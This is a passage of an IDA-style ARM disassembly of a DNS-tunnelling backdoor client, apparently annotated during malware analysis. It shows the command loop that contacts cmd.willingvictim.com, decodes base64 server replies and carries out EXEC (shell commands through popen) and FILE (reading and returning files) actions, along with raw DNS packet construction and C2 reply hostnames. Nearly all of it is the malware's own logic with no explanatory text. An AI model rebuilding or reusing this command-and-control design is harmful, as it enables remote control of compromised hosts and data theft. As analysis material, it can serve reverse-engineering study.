*off_11908 .text:00011908 off_11908 DCD aR ; DATA XREF: FILE_command+30r .text:00011908 ; "r" .text:0001190C ; char *off_1190C .text:0001190C off_1190C DCD aFileStart_stat ; DATA XREF: FILE_command+C8r .text:0001190C ; FILE_command+E0r ... .text:0001190C ; "FILE:START_STATE,NAME=" .text:00011910 ; char *off_11910 .text:00011910 off_11910 DCD aFileStop_state ; DATA XREF: FILE_command+124r .text:00011910 ; FILE_command+130r .text:00011910 ; "FILE:STOP_STATE" .text:00011914 off_11914 DCD __bss_start ; DATA XREF: FILE_command:loc_118E0r .text:00011918 ; void *ptr .text:00011918 ptr DCD aErrorReadingFi ; DATA XREF: FILE_command+160r .text:00011918 ; "Error reading file" .text:0001191C .text:0001191C ; =============== S U B R O U T I N E ======================================= .text:0001191C .text:0001191C .text:0001191C InterpretAndExecuteCommand ; CODE XREF: mainLoop+54p .text:0001191C .text:0001191C var_18 = -0x18 .text:0001191C var_14 = -0x14 .text:0001191C var_10 = -0x10 .text:0001191C .text:0001191C STMFD SP!, {R4-R6,LR} .text:00011920 LDR R3, =aHello ; "HELLO:" .text:00011924 SUB SP, SP, #8 .text:00011928 LDR R1, [R3,#(dword_21ECC - 0x21E54)] ; "cmd.willingvictim.com" .text:0001192C MOV R5, R0 .text:00011930 BL send_packet_to_C_C .text:00011934 CMP R0, #1 .text:00011938 BNE error .text:0001193C MOV R3, #0 .text:00011940 ADD R2, SP, #0x18+var_10 .text:00011944 STR R3, [R2,#-4]! .text:00011948 MOV R4, R0 .text:0001194C MOV R1, SP .text:00011950 MOV R0, R5 .text:00011954 BL base64_decode .text:00011958 LDR R3, [SP,#0x18+var_14] .text:0001195C CMP R3, #0 .text:00011960 BEQ error .text:00011964 LDR R0, [SP,#0x18+var_18] .text:00011968 BL getCommandID .text:0001196C CMP R0, #2 .text:00011970 BEQ NONE_received .text:00011974 CMP R0, #3 .text:00011978 BEQ EXEC_received .text:0001197C CMP R0, #4 .text:00011980 BEQ FILE_received .text:00011984 MOV R4, #0xFFFFFFFF .text:00011988 LDR R0, =aControlServerP ; "\nControl server protocol mistmatch." .text:0001198C BL printf .text:00011990 MOV R0, R4 .text:00011994 ADD SP, SP, #8 .text:00011998 LDMFD SP!, {R4-R6,PC} .text:0001199C ; --------------------------------------------------------------------------- .text:0001199C .text:0001199C error ; CODE XREF: InterpretAndExecuteCommand+1Cj .text:0001199C ; InterpretAndExecuteCommand+44j .text:0001199C MOV R4, #0xFFFFFFFF .text:000119A0 .text:000119A0 return ; CODE XREF: InterpretAndExecuteCommand+A4j .text:000119A0 ; InterpretAndExecuteCommand+B0j ... .text:000119A0 MOV R0, R4 .text:000119A4 ADD SP, SP, #8 .text:000119A8 LDMFD SP!, {R4-R6,PC} .text:000119AC ; --------------------------------------------------------------------------- .text:000119AC .text:000119AC FILE_received ; CODE XREF: InterpretAndExecuteCommand+64j .text:000119AC LDR R0, =aServerSpecifie ; "\nServer specified FILE action." .text:000119B0 BL printf .text:000119B4 LDR R0, [SP,#0x18+var_18] .text:000119B8 BL FILE_command .text:000119BC CMP R0, #1 .text:000119C0 BEQ return .text:000119C4 .text:000119C4 exec_failed ; CODE XREF: InterpretAndExecuteCommand+F0j .text:000119C4 LDR R0, =aFailedToExecut ; "\nFailed to execute the command request"... .text:000119C8 BL printf .text:000119CC B return .text:000119D0 ; --------------------------------------------------------------------------- .text:000119D0 .text:000119D0 NONE_received ; CODE XREF: InterpretAndExecuteCommand+54j .text:000119D0 LDR R0, =aServerSpecif_0 ; "\nServer specified NONE action." .text:000119D4 BL printf .text:000119D8 B return .text:000119DC ; --------------------------------------------------------------------------- .text:000119DC .text:000119DC EXEC_received ; CODE XREF: InterpretAndExecuteCommand+5Cj .text:000119DC LDR R0, =aServerSpecif_1 ; "\nServer specified EXEC action." .text:000119E0 BL printf .text:000119E4 MOV R0, #0x800 ; size .text:000119E8 BL malloc .text:000119EC MOV R1, R0 .text:000119F0 MOV R5, R0 .text:000119F4 LDR R0, [SP,#0x18+var_18] .text:000119F8 BL EXEC_command .text:000119FC MOV R6, R0 .text:00011A00 MOV R0, R5 ; ptr .text:00011A04 BL free .text:00011A08 CMP R6, #1 .text:00011A0C BNE exec_failed .text:00011A10 B return .text:00011A10 ; End of function InterpretAndExecuteCommand .text:00011A10 .text:00011A10 ; --------------------------------------------------------------------------- .text:00011A14 off_11A14 DCD aHello ; DATA XREF: InterpretAndExecuteCommand+4r .text:00011A14 ; "HELLO:" .text:00011A18 ; char *off_11A18 .text:00011A18 off_11A18 DCD aControlServerP ; DATA XREF: InterpretAndExecuteCommand+6Cr .text:00011A18 ; "\nControl server protocol mistmatch." .text:00011A1C ; char *off_11A1C .text:00011A1C off_11A1C DCD aServerSpecifie ; DATA XREF: InterpretAndExecuteCommand:FILE_receivedr .text:00011A1C ; "\nServer specified FILE action." .text:00011A20 ; char *off_11A20 .text:00011A20 off_11A20 DCD aFailedToExecut ; DATA XREF: InterpretAndExecuteCommand:exec_failedr .text:00011A20 ; "\nFailed to execute the command request"... .text:00011A24 ; char *off_11A24 .text:00011A24 off_11A24 DCD aServerSpecif_0 ; DATA XREF: InterpretAndExecuteCommand:NONE_receivedr .text:00011A24 ; "\nServer specified NONE action." .text:00011A28 ; char *off_11A28 .text:00011A28 off_11A28 DCD aServerSpecif_1 ; DATA XREF: InterpretAndExecuteCommand:EXEC_receivedr .text:00011A28 ; .text ends ; "\nServer specified EXEC action." .text:00011A28 .fini:00011A2C ; =========================================================================== .fini:00011A2C .fini:00011A2C ; Segment type: Pure code .fini:00011A2C AREA .fini, CODE .fini:00011A2C ; ORG 0x11A2C .fini:00011A2C CODE32 .fini:00011A2C .fini:00011A2C ; =============== S U B R O U T I N E ======================================= .fini:00011A2C .fini:00011A2C .fini:00011A2C EXPORT .term_proc .fini:00011A2C .term_proc ; DATA XREF: start+10o .fini:00011A2C ; .text:off_10E44o .fini:00011A2C STMFD SP!, {R0,LR} ; _fini .fini:00011A30 LDMFD SP!, {R0,LR} .fini:00011A34 TST LR, #1 .fini:00011A38 MOVEQ PC, LR .fini:00011A3C BX LR .fini:00011A3C ; End of function .term_proc .fini:00011A3C .fini:00011A3C ; .fini ends .fini:00011A3C .rodata:00011A40 ; =========================================================================== .rodata:00011A40 .rodata:00011A40 ; Segment type: Pure data .rodata:00011A40 AREA .rodata, DATA, READONLY .rodata:00011A40 ; ORG 0x11A40 .rodata:00011A40 aBase64decode DCB "Base64Decode",0 ; DATA XREF: base64_decode+80o .rodata:00011A40 ; .text:functiono .rodata:00011A4D ALIGN 0x10 .rodata:00011A50 aLibnet_initS DCB "libnet_init: %s",0 ; DATA XREF: buildAndSendDNSPacket+228o .rodata:00011A50 ; .text:off_1132Co .rodata:00011A60 aCSCCCCCCCCCCCC DCB "%c%s%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s",0 .rodata:00011A60 ; DATA XREF: buildAndSendDNSPacket+A4o .rodata:00011A60 ; .text:off_11310o .rodata:00011A8B ALIGN 4 .rodata:00011A8C aCanTBuildDnsPa DCB "Can't build DNS packet: %s",0xA,0 .rodata:00011A8C ; DATA XREF: buildAndSendDNSPacket+1D0o .rodata:00011A8C ; .text:off_11324o .rodata:00011AA8 aCanTBuildUdpHe DCB "Can't build UDP header: %s",0xA,0 .rodata:00011AA8 ; DATA XREF: buildAndSendDNSPacket+208o .rodata:00011AA8 ; .text:off_11328o .rodata:00011AC4 aCanTBuildIpHea DCB "Can't build IP header: %s",0xA,0 .rodata:00011AC4 ; DATA XREF: buildAndSendDNSPacket+248o .rodata:00011AC4 ; .text:off_11330o .rodata:00011ADF ALIGN 0x10 .rodata:00011AE0 aClient_c DCB "client.c",0 ; DATA XREF: base64_decode+88o .rodata:00011AE0 ; .text:fileo .rodata:00011AE9 ALIGN 4 .rodata:00011AEC aLengthDecodele DCB "*length == decodeLen",0 ; DATA XREF: base64_decode+8Co .rodata:00011AEC ; .text:assertiono .rodata:00011B01 ALIGN 4 .rodata:00011B04 aControlServerP DCB 0xA ; DATA XREF: init_session_with_C2_server:unknown_commando .rodata:00011B04 ; .text:off_11490o ... .rodata:00011B04 DCB "Control server protocol mistmatch.",0 .rodata:00011B28 aR DCB "r",0 ; DATA XREF: EXEC_command+1Co .rodata:00011B28 ; .text:modeso ... .rodata:00011B2A ALIGN 4 .rodata:00011B2C aErrorReadingFi DCB "Error reading file",0 ; DATA XREF: FILE_command+160o .rodata:00011B2C ; .text:ptro .rodata:00011B3F ALIGN 0x10 .rodata:00011B40 aServerSpecif_0 DCB 0xA ; DATA XREF: InterpretAndExecuteCommand:NONE_receivedo .rodata:00011B40 ; .text:off_11A24o .rodata:00011B40 DCB "Server specified NONE action.",0 .rodata:00011B5F ALIGN 0x10 .rodata:00011B60 aServerSpecif_1 DCB 0xA ; DATA XREF: InterpretAndExecuteCommand:EXEC_receivedo .rodata:00011B60 ; .text:off_11A28o .rodata:00011B60 DCB "Server specified EXEC action.",0 .rodata:00011B7F ALIGN 0x10 .rodata:00011B80 aFailedToExecut DCB 0xA ; DATA XREF: InterpretAndExecuteCommand:exec_failedo .rodata:00011B80 ; .text:off_11A20o .rodata:00011B80 DCB "Failed to execute the command requested.",0 .rodata:00011BAA ALIGN 4 .rodata:00011BAC aServerSpecifie DCB 0xA ; DATA XREF: InterpretAndExecuteCommand:FILE_receivedo .rodata:00011BAC ; .text:off_11A1Co .rodata:00011BAC DCB "Server specified FILE action.",0 .rodata:00011BCB ALIGN 4 .rodata:00011BCC aControlServerS DCB 0xA ; DATA XREF: mainLoop:HELLOReceivedo .rodata:00011BCC ; .text:off_10E10o .rodata:00011BCC DCB "Control server says HELLO. Entering command mode.",0 .rodata:00011BFF ALIGN 0x10 .rodata:00011C00 aConnectionCoul DCB 0xA ; DATA XREF: mainLoop+30o .rodata:00011C00 ; .text:formato .rodata:00011C00 DCB "Connection could not be made. Sleeping.",0 .rodata:00011C29 ALIGN 4 .rodata:00011C2C aReply_willingv DCB "reply.willingvictim.com",0 .rodata:00011C44 aCmd_willingvic DCB "cmd.willingvictim.com",0 ; DATA XREF: .data:00021ED4o .rodata:00011C5A ALIGN 4 .rodata:00011C5C aCheck_willingv DCB "check.willingvictim.com",0 .rodata:00011C74 a172_16_240_129 DCB "172.16.240.129",0 .rodata:00011C83 ALIGN 4 .rodata:00011C83 ; .rodata ends .rodata:00011C83 .eh_frame:00011C84 ; =========================================================================== .eh_frame:00011C84 .eh_frame:00011C84 ; Segment type: Pure data .eh_frame:00011C84 AREA .eh_frame, DATA, READONLY .eh_frame:00011C84 ; ORG 0x11C84 .eh_frame:00011C84 unk_11C84 DCB 0 ; DATA XREF: sub_10EB8+28o .eh_frame:00011C84 ; .text:off_10EFCo ... .eh_frame:00011C85 DCB 0 .eh_frame:00011C86 DCB 0 .eh_frame:00011C87 DCB 0 .eh_frame:00011C87 ; .eh_frame ends .eh_frame:00011C87 .init_array:00021C88 ; =========================================================================== .init_array:00021C88 .init_array:00021C88 ; Segment type: Pure data .init_array:00021C88 AREA .init_array, DATA .init_array:00021C88 ; ORG 0x21C88 .init_array:00021C88 DCD sub_10F00 .init_array:00021C88 ; .init_array ends .init_array:00021C88 .fini_array:00021C8C ; =========================================================================== .fini_array:00021C8C .fini_array:00021C8C ; Segment type: Pure data .fini_array:00021C8C AREA .fini_array, DATA .fini_array:00021C8C ; ORG 0x21C8C .fini_array:00021C8C DCD sub_10EB8 .fini_array:00021C8C ; .fini_array ends .fini_array:00021C8C .got:00021D78 ; =========================================================================== .got:00021D78 .got:00021D78 ; Segment type: Pure data .got:00021D78 AREA .got, DATA .got:00021D78 ; ORG 0x21D78 .got:00021D78 _GLOBAL_OFFSET_TABLE_ DCD 0x21C90 ; DATA XREF: .plt:00010B34o .got:00021D78 ; .plt:off_10B3Co .got:00021D7C DCD 0 .got:00021D80 DCD 0 .got:00021D84 printf_ptr DCD __imp_printf ; DATA XREF: printf+8r .got:00021D88 exit_ptr DCD __imp_exit ; DATA XREF: exit+8r .got:00021D8C ns_initparse_ptr DCD __imp_ns_initparse ; DATA XREF: ns_initparse+8r .got:00021D90 strstr_ptr DCD __imp_strstr ; DATA XREF: strstr+8r .got:00021D94 fread_ptr DCD __imp_fread ; DATA XREF: fread+8r .got:00021D98 ns_parserr_ptr DCD __imp_ns_parserr ; DATA XREF: ns_parserr+8r .got:00021D9C fgets_ptr DCD __imp_fgets ; DATA XREF: fgets+8r .got:00021DA0 calloc_ptr DCD __imp_calloc ; DATA XREF: calloc+8r .got:00021DA4 htons_ptr DCD __imp_htons ; DATA XREF: htons+8r .got:00021DA8 __res_state_ptr DCD __imp___res_state ; DATA XREF: __res_state+8r .got:00021DAC free_ptr DCD __imp_free ; DATA XREF: free+8r .got:00021DB0 BIO_push_ptr DCD __imp_BIO_push ; DATA XREF: BIO_push+8r .got:00021DB4 BIO_read_ptr DCD __imp_BIO_read ; DATA XREF: BIO_read+8r .got:00021DB8 fprintf_ptr DCD __imp_fprintf ; DATA XREF: fprintf+8r .got:00021DBC BIO_f_base64_ptr DCD __imp_BIO_f_base64 ; DATA XREF: BIO_f_base64+8r .got:00021DC0 libnet_get_ipaddr4_ptr DCD __imp_libnet_get_ipaddr4 .got:00021DC0 ; DATA XREF: libnet_get_ipaddr4+8r .got:00021DC4 memcpy_ptr DCD __imp_memcpy ; DATA XREF: memcpy+8r .got:00021DC8 libnet_build_ipv4_ptr DCD __imp_libnet_build_ipv4 .got:00021DC8 ; DATA XREF: libnet_build_ipv4+8r .got:00021DCC libnet_destroy_ptr DCD __imp_libnet_destroy ; DATA XREF: libnet_destroy+8r .got:00021DD0 pclose_ptr DCD __imp_pclose ; DATA XREF: pclose+8r .got:00021DD4 memset_ptr DCD __imp_memset ; DATA XREF: memset+8r .got:00021DD8 res_init_ptr DCD __imp_res_init ; DATA XREF: res_init+8r .got:00021DDC popen_ptr DCD __imp_popen ; DATA XREF: popen+8r .got:00021DE0 BIO_set_flags_ptr DCD __imp_BIO_set_flags ; DATA XREF: BIO_set_flags+8r .got:00021DE4 BIO_new_mem_buf_ptr DCD __imp_BIO_new_mem_buf ; DATA XREF: BIO_new_mem_buf+8r .got:00021DE8 res_query_ptr DCD __imp_res_query ; DATA XREF: res_query+8r .got:00021DEC BIO_new_ptr DCD __imp_BIO_new ; DATA XREF: BIO_new+8r .got:00021DF0 BIO_ctrl_ptr DCD __imp_BIO_ctrl ; DATA XREF: BIO_ctrl+8r .got:00021DF4 fwrite_ptr DCD __imp_fwrite ; DATA XREF: fwrite+8r .got:00021DF8 fopen_ptr DCD __imp_fopen ; DATA XREF: fopen+8r .got:00021DFC __deregister_frame_info_ptr DCD __imp___deregister_frame_info .got:00021DFC ; DATA XREF: __deregister_frame_info+8r .got:00021E00 snprintf_ptr DCD __imp_snprintf ; DATA XREF: snprintf+8r .got:00021E04 __register_frame_info_ptr DCD __imp___register_frame_info .got:00021E04 ; DATA XREF: __register_frame_info+8r .got:00021E08 libnet_init_ptr DCD __imp_libnet_init ; DATA XREF: libnet_init+8r .got:00021E0C __libc_start_main_ptr DCD __imp___libc_start_main .got:00021E0C ; DATA XREF: __libc_start_main+8r .got:00021E10 fseek_ptr DCD __imp_fseek ; DATA XREF: fseek+8r .got:00021E14 fclose_ptr DCD __imp_fclose ; DATA XREF: fclose+8r .got:00021E18 libnet_build_dnsv4_ptr DCD __imp_libnet_build_dnsv4 .got:00021E18 ; DATA XREF: libnet_build_dnsv4+8r .got:00021E1C BIO_free_all_ptr DCD __imp_BIO_free_all ; DATA XREF: BIO_free_all+8r .got:00021E20 inet_aton_ptr DCD __imp_inet_aton ; DATA XREF: inet_aton+8r .got:00021E24 libnet_write_ptr DCD __imp_libnet_write ; DATA XREF: libnet_write+8r .got:00021E28 libnet_geterror_ptr DCD __imp_libnet_geterror ; DATA XREF: libnet_geterror+8r .got:00021E2C sleep_ptr DCD __imp_sleep ; DATA XREF: sleep+8r .got:00021E30 strlen_ptr DCD __imp_strlen ; DATA XREF: strlen+8r .got:00021E34 libnet_build_udp_ptr DCD __imp_libnet_build_udp .got:00021E34 ; DATA XREF: libnet_build_udp+8r .got:00021E38 BIO_write_ptr DCD __imp_BIO_write ; DATA XREF: BIO_write+8r .got:00021E3C libnet_name2addr4_ptr DCD __imp_libnet_name2addr4 .got:00021E3C ; DATA XREF: libnet_name2addr4+8r .got:00021E40 BIO_s_mem_ptr DCD __imp_BIO_s_mem ; DATA XREF: BIO_s_mem+8r .got:00021E44 __assert_fail_ptr DCD __imp___assert_fail ; DATA XREF: __assert_fail+8r .got:00021E48 malloc_ptr DCD __imp_malloc ; DATA XREF: malloc+8r .got:00021E4C ftell_ptr DCD __imp_ftell ; DATA XREF: ftell+8r .got:00021E4C ; .got ends .got:00021E4C .data:00021E50 ; =========================================================================== .data:00021E50 .data:00021E50 ; Segment type: Pure data .data:00021E50 AREA .data, DATA .data:00021E50 ; ORG 0x21E50 .data:00021E50 DCB 0 .data:00021E51 DCB 0 .data:00021E52 DCB 0 .data:00021E53 DCB 0 .data:00021E54 aHello DCB "HELLO:",0 ; DATA XREF: mainLoop+14o .data:00021E54 ; .text:off_10E08o ... .data:00021E5B ALIGN 4 .data:00021E5C aNone DCB "NONE:",0 ; DATA XREF: getCommandID:Is_it_NONEo .data:00021E5C ; .text:off_10FA8o .data:00021E62 ALIGN 4 .data:00021E64 aExec DCB "EXEC:",0 ; DATA XREF: getCommandID:Is_it_EXECo .data:00021E64 ; .text:off_10FACo ... .data:00021E6A ALIGN 4 .data:00021E6C aFile DCB "FILE:",0 ; DATA XREF: getCommandID+5Co .data:00021E6C ; .text:off_10FB0o ... .data:00021E72 ALIGN 4 .data:00021E74 dword_21E74 DCD 0x11C74 ; DATA XREF: send_packet_to_C_C+20r .data:00021E74 ; sendShortReplyTo_C2_Server+1Cr ... .data:00021E78 dword_21E78 DCD 0x11C5C ; DATA XREF: init_session_with_C2_server+10r .data:00021E7C dword_21E7C DCD 0x11C2C ; DATA XREF: sendShortReplyTo_C2_Server+18r .data:00021E7C ; sendLargeReplyTo_C2_server+70r .data:00021E80 aExecStart_stat DCB "EXEC:START_STATE",0 ; DATA XREF: EXEC_command+30o .data:00021E80 ; EXEC_command+3Co ... .data:00021E91 ALIGN 4 .data:00021E94 aExecStop_state DCB "EXEC:STOP_STATE",0 ; DATA XREF: EXEC_command+80o .data:00021E94 ; EXEC_command+8Co ... .data:00021EA4 aFileStart_stat DCB "FILE:START_STATE,NAME=",0 ; DATA XREF: FILE_command+C8o .data:00021EA4 ; FILE_command+E0o ... .data:00021EBB ALIGN 4 .data:00021EBC aFileStop_state DCB "FILE:STOP_STATE",0 ; DATA XREF: FILE_command+124o .data:00021EBC ; FILE_command+130o ... .data:00021ECC dword_21ECC DCD 0x11C44 ; DATA XREF: InterpretAndExecuteCommand+Cr .data:00021ED0 dword_21ED0 DCD 2 ; DATA XREF: mainLoop:lookForC2Commandr .data:00021ED4 DCD aCmd_willingvic+4 ; "willingvictim.com" .data:00021ED4 ; .data ends .data:00021ED4 .bss:00021ED8 ; =========================================================================== .bss:00021ED8 .bss:00021ED8 ; Segment type: Uninitialized .bss:00021ED8 AREA .bss, DATA .bss:00021ED8 ; ORG 0x21ED8 .bss:00021ED8 EXPORT __bss_start .bss:00021ED8 __bss_start % 4 ; DATA XREF: sub_10E50o .bss:00021ED8 ; .text:off_10E74o ... .bss:00021ED8 ; Alternative name is '__bss_start__' .bss:00021ED8 ; stderr .bss:00021ED8 ; __bss_start__ .bss:00021ED8 ; _edata .bss:00021ED8 ; Copy of shared data .bss:00021EDC byte_21EDC % 1 ; DATA XREF: sub_10EB8o .bss:00021EDC ; sub_10EB8+4r ... .bss:00021EDD ALIGN 0x10 .bss:00021EE0 unk_21EE0 % 1 ; DATA XREF: sub_10F00+10o .bss:00021EE0 ; .text:off_10F28o .bss:00021EE1 % 1 .bss:00021EE2 % 1 .bss:00021EE3 % 1 .bss:00021EE4 % 1 .bss:00021EE5 % 1 .bss:00021EE6 % 1 .bss:00021EE7 % 1 .bss:00021EE8 % 1 .bss:00021EE9 % 1 .bss:00021EEA % 1 .bss:00021EEB % 1 .bss:00021EEC % 1 .bss:00021EED % 1 .bss:00021EEE % 1 .bss:00021EEF % 1 .bss:00021EF0 % 1 .bss:00021EF1 % 1 .bss:00021EF2 % 1 .bss:00021EF3 % 1 .bss:00021EF4 % 1 .bss:00021EF5 % 1 .bss:00021EF6 % 1 .bss:00021EF7 % 1 .bss:00021EF8 dword_21EF8 % 4 ; DATA XREF: sendLargeBufferTo_C2_server+44o .bss:00021EF8 ; .text:off_116D4o .bss:00021EF8 ; .bss ends .bss:00021EF8 extern:00021EFC ; =========================================================================== extern:00021EFC extern:00021EFC ; Segment type: Externs extern:00021EFC ; int printf(const char *format, ...) extern:00021EFC IMPORT __imp_printf ; CODE XREF: printf+8j extern:00021EFC ; DATA XREF: .got:printf_ptro extern:00021F00 ; void exit(int status) extern:00021F00 IMPORT __imp_exit ; CODE XREF: exit+8j extern:00021F00 ; DATA XREF: .got:exit_ptro extern:00021F04 IMPORT __imp_ns_initparse ; CODE XREF: ns_initparse+8j extern:00021F04 ; DATA XREF: .got:ns_initparse_ptro extern:00021F08 ; char *strstr(const char *haystack, const char *needle) extern:00021F08 IMPORT __imp_strstr ; CODE XREF: strstr+8j extern:00021F08 ; DATA XREF: .got:strstr_ptro extern:00021F0C ; size_t fread(void *ptr, size_t size, size_t n, FILE *stream) extern:00021F0C IMPORT __imp_fread ; CODE XREF: fread+8j extern:00021F0C ; DATA XREF: .got:fread_ptro extern:00021F10 IMPORT __imp_ns_parserr ; CODE XREF: ns_parserr+8j extern:00021F10 ; DATA XREF: .got:ns_parserr_ptro extern:00021F14 ; char *fgets(char *s, int n, FILE *stream) extern:00021F14 IMPORT __imp_fgets ; CODE XREF: fgets+8j extern:00021F14 ; DATA XREF: .got:fgets_ptro extern:00021F18 ; void *calloc(size_t nmemb, size_t size) extern:00021F18 IMPORT __imp_calloc ; CODE XREF: calloc+8j extern:00021F18 ; DATA XREF: .got:calloc_ptro extern:00021F1C ; uint16_t htons(uint16_t hostshort) extern:00021F1C IMPORT __imp_htons ; CODE XREF: htons+8j extern:00021F1C ; DATA XREF: .got:htons_ptro extern:00021F20 ; struct __res_state *__res_state(void) extern:00021F20 IMPORT __imp___res_state ; CODE XREF: __res_state+8j extern:00021F20 ; DATA XREF: .got:__res_state_ptro extern:00021F24 ; void free(void *ptr) extern:00021F24 IMPORT __imp_free ; CODE XREF: free+8j extern:00021F24 ; DATA XREF: .got:free_ptro extern:00021F28 IMPORT __imp_BIO_push ; CODE XREF: BIO_push+8j extern:00021F28 ; DATA XREF: .got:BIO_push_ptro extern:00021F2C IMPORT __imp_BIO_read ; CODE XREF: BIO_read+8j extern:00021F2C ; DATA XREF: .got:BIO_read_ptro extern:00021F30 ; int fprintf(FILE *stream, const char *format, ...) extern:00021F30 IMPORT __imp_fprintf ; CODE XREF: fprintf+8j extern:00021F30 ; DATA XREF: .got:fprintf_ptro extern:00021F34 IMPORT __imp_BIO_f_base64 ; CODE XREF: BIO_f_base64+8j extern:00021F34 ; DATA XREF: .got:BIO_f_base64_ptro extern:00021F38 IMPORT __imp_libnet_get_ipaddr4 extern:00021F38 ; CODE XREF: libnet_get_ipaddr4+8j extern:00021F38 ; DATA XREF: .got:libnet_get_ipaddr4_ptro extern:00021F3C ; void *memcpy(void *dest, const void *src, size_t n) extern:00021F3C IMPORT __imp_memcpy ; CODE XREF: memcpy+8j extern:00021F3C ; DATA XREF: .got:memcpy_ptro extern:00021F40 IMPORT __imp_libnet_build_ipv4 extern:00021F40 ; CODE XREF: libnet_build_ipv4+8j extern:00021F40 ; DATA XREF: .got:libnet_build_ipv4_ptro extern:00021F44 IMPORT __imp_libnet_destroy ; CODE XREF: libnet_destroy+8j extern:00021F44 ; DATA XREF: .got:libnet_destroy_ptro extern:00021F48 ; int pclose(FILE *stream) extern:00021F48 IMPORT __imp_pclose ; CODE XREF: pclose+8j extern:00021F48 ; DATA XREF: .got:pclose_ptro extern:00021F4C ; void *memset(void *s, int c, size_t n) extern:00021F4C IMPORT __imp_memset ; CODE XREF: memset+8j extern:00021F4C ; DATA XREF: .got:memset_ptro extern:00021F50 IMPORT __imp_res_init ; CODE XREF: res_init+8j extern:00021F50 ; DATA XREF: .got:res_init_ptro extern:00021F54 ; FILE *popen(const char *command, const char *modes) extern:00021F54 IMPORT __imp_popen ; CODE XREF: popen+8j extern:00021F54 ; DATA XREF: .got:popen_ptro extern:00021F58 IMPORT __imp_BIO_set_flags ; CODE XREF: BIO_set_flags+8j extern:00021F58 ; DATA XREF: .got:BIO_set_flags_ptro extern:00021F5C IMPORT __imp_BIO_new_mem_buf ; CODE XREF: BIO_new_mem_buf+8j extern:00021F5C ; DATA XREF: .got:BIO_new_mem_buf_ptro extern:00021F60 IMPORT __imp_res_query ; CODE XREF: res_query+8j extern:00021F60 ; DATA XREF: .got:res_query_ptro extern:00021F64 IMPORT __imp_BIO_new ; CODE XREF: BIO_new+8j extern:00021F64 ; DATA XREF: .got:BIO_new_ptro extern:00021F68 IMPORT __imp_BIO_ctrl ; CODE XREF: BIO_ctrl+8j extern:00021F68 ; DATA XREF: .got:BIO_ctrl_ptro extern:00021F6C ; size_t fwrite(const void *ptr, size_t size, size_t n, FILE *s) extern:00021F6C IMPORT __imp_fwrite ; CODE XREF: fwrite+8j extern:00021F6C ; DATA XREF: .got:fwrite_ptro extern:00021F70 ; FILE *fopen(const char *filename, const char *modes) extern:00021F70 IMPORT __imp_fopen ; CODE XREF: fopen+8j extern:00021F70 ; DATA XREF: .got:fopen_ptro extern:00021F74 ; int snprintf(char *s, size_t maxlen, const char *format, ...) extern:00021F74 IMPORT __imp_snprintf ; CODE XREF: snprintf+8j extern:00021F74 ; DATA XREF: .got:snprintf_ptro extern:00021F78 IMPORT __imp_libnet_init ; CODE XREF: libnet_init+8j extern:00021F78 ; DATA XREF: .got:libnet_init_ptro extern:00021F7C ; int __cdecl __libc_start_main(int (__cdecl *main)(int, char **, char **), int argc, char **ubp_av, void (*init)(void), void (*fini)(void), void (*rtld_fini)(void), void *stack_end) extern:00021F7C IMPORT __imp___libc_start_main extern:00021F7C ; CODE XREF: __libc_start_main+8j extern:00021F7C ; DATA XREF: .got:__libc_start_main_ptro extern:00021F80 ; int fseek(FILE *stream, __int32 off, int whence) extern:00021F80 IMPORT __imp_fseek ; CODE XREF: fseek+8j extern:00021F80 ; DATA XREF: .got:fseek_ptro extern:00021F84 ; int fclose(FILE *stream) extern:00021F84 IMPORT __imp_fclose ; CODE XREF: fclose+8j extern:00021F84 ; DATA XREF: .got:fclose_ptro extern:00021F88 IMPORT __imp_libnet_build_dnsv4 extern:00021F88 ; CODE XREF: libnet_build_dnsv4+8j extern:00021F88 ; DATA XREF: .got:libnet_build_dnsv4_ptro extern:00021F8C IMPORT __imp_BIO_free_all ; CODE XREF: BIO_free_all+8j extern:00021F8C ; DATA XREF: .got:BIO_free_all_ptro extern:00021F90 ; int inet_aton(const char *cp, struct in_addr *inp) extern:00021F90 IMPORT __imp_inet_aton ; CODE XREF: inet_aton+8j extern:00021F90 ; DATA XREF: .got:inet_aton_ptro extern:00021F94 IMPORT __imp_libnet_write ; CODE XREF: libnet_write+8j extern:00021F94 ; DATA XREF: .got:libnet_write_ptro extern:00021F98 IMPORT __imp_libnet_geterror ; CODE XREF: libnet_geterror+8j extern:00021F98 ; DATA XREF: .got:libnet_geterror_ptro extern:00021F9C ; unsigned int sleep(unsigned int seconds) extern:00021F9C IMPORT __imp_sleep ; CODE XREF: sleep+8j extern:00021F9C ; DATA XREF: .got:sleep_ptro extern:00021FA0 ; size_t strlen(const char *s) extern:00021FA0 IMPORT __imp_strlen ; CODE XREF: strlen+8j extern:00021FA0 ; DATA XREF: .got:strlen_ptro extern:00021FA4 IMPORT __imp_libnet_build_udp extern:00021FA4 ; CODE XREF: libnet_build_udp+8j extern:00021FA4 ; DATA XREF: .got:libnet_build_udp_ptro extern:00021FA8 IMPORT __imp_BIO_write ; CODE XREF: BIO_write+8j extern:00021FA8 ; DATA XREF: .got:BIO_write_ptro extern:00021FAC IMPORT __imp_libnet_name2addr4 extern:00021FAC ; CODE XREF: libnet_name2addr4+8j extern:00021FAC ; DATA XREF: .got:libnet_name2addr4_ptro extern:00021FB0 IMPORT __imp_BIO_s_mem ; CODE XREF: BIO_s_mem+8j extern:00021FB0 ; DATA XREF: .got:BIO_s_mem_ptro extern:00021FB4 ; void __assert_fail(const char *assertion, const char *file, unsigned int line, const char *function) extern:00021FB4 IMPORT __imp___assert_fail ; CODE XREF: __assert_fail+8j extern:00021FB4 ; DATA XREF: .got:__assert_fail_ptro extern:00021FB8 ; void *malloc(size_t size) extern:00021FB8 IMPORT __imp_malloc ; CODE XREF: malloc+8j extern:00021FB8 ; DATA XREF: .got:malloc_ptro extern:00021FBC ; __int32 ftell(FILE *stream) extern:00021FBC IMPORT __imp_ftell ; CODE XREF: ftell+8j extern:00021FBC ; DATA XREF: .got:ftell_ptro extern:00021FC0 IMPORT _ITM_deregisterTMCloneTable, WEAK extern:00021FC4 IMPORT __imp___deregister_frame_info, WEAK extern:00021FC4 ; CODE XREF: __deregister_frame_info+8j extern:00021FC4 ; DATA XREF: .got:__deregister_frame_info_ptro extern:00021FC8 IMPORT __imp___register_frame_info, WEAK extern:00021FC8 ; CODE XREF: __register_frame_info+8j extern:00021FC8 ; DATA XREF: .got:__register_frame_info_ptro extern:00021FCC IMPORT _ITM_registerTMCloneTable, WEAK extern:00021FCC extern:00021FCC END start